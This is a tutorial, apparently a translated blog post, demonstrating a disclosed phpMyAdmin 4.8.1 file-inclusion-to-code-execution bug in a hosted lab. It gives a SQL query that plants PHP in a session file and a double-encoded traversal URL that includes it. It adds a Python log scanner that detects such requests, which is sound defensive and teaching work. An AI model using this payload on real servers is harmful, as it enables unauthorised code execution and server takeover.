phpMyAdmin 4.8.x local file inclusion exploit
Today the CHAMD5 security team disclosed a local file inclusion vulnerability in the latest version of phpMyAdmin: phpmyadmin4.8.1 background Getshell. The exploit does not require a root account; it only requires being logged in to phpMyAdmin.
In this article we use Vulnspy's online phpMyAdmin environment to demonstrate exploitation of this vulnerability.
Vulnspy Online phpMyAdmin Environment address: HTTP://WWW.VULNSPY.COM/PHPMYADMIN-4.8.1/
Vulnerability Details
Refer to the article published by the CHAMD5 security team: phpmyadmin4.8.1 backstage Getshell
Exploitation
Because the approach in the original article, including the database file, may not be usable due to file permissions or insufficient account privileges, here we exploit the file inclusion vulnerability another way: through the session file.
1. Open the Vulnspy online phpMyAdmin environment address and click Start to Hack to jump to Vsplate
2. Wait for the settings to load, then click the GO button to start the experiment
3. After the experiment is created, click the demo address to enter the experiment
4. Log in to phpMyAdmin with account root, password Toor
5. Click the SQL button in the top navigation bar and execute the SQL query
select '<?php phpinfo();exit;?>'
6. Get your session ID
Your session ID is the value of the phpMyAdmin item in the cookie.
This corresponds to the session file /var/lib/php/sessions/sess_<your SESSION ID>.
7. Include the session file to successfully exploit this vulnerability
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
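A log check for the request in step 7, as an added example that is not part of the original article: it decodes the `target` parameter once, as the server would, then flags values that are still percent-encoded, contain `../`, or end in a `sess_` file name. The combined access-log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SESSION_FILE = re.compile(r"/sess_[A-Za-z0-9,-]+$")

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_target(url):
    """List the reasons a request's target parameter resembles step 7."""
    reasons = []
    # parse_qs applies the one decode the web server/PHP would apply itself.
    for target in parse_qs(urlsplit(url).query).get("target", []):
        decoded, extra_rounds = fully_decode(target)
        if extra_rounds:
            reasons.append("double-encoded")
        if "../" in decoded:
            reasons.append("path-traversal")
        if SESSION_FILE.search(decoded):
            reasons.append("session-file")
    return reasons

def scan(log_lines):
    """Return (line_number, reasons) for every flagged access-log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match and (reasons := inspect_target(match.group(1))):
            hits.append((number, reasons))
    return hits

# Constructed log lines (documentation IP); line 2 carries the step 7 request.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jun/2018:10:00:01 +0000] "GET /index.php?target=db_sql.php&db=test HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Jun/2018:10:00:09 +0000] "GET /index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k HTTP/1.1" 200 90311',
    '203.0.113.7 - - [21/Jun/2018:10:00:15 +0000] "GET /index.php?target=db_structure.php&db=test HTTP/1.1" 200 4870',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```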
GitHub Source
https://github.com/vulnspy/phpmyadmin-4.8.1
Reference
"Starter" phpmyadmin4.8.1 backstage Getshell
PhpMyAdmin 4.8.x LFI to RCE (Authorization Required) - https://blog.vulnspy.com/2018/06/21/phpmyadmin-4-8-x-authorited-cli-to-rce/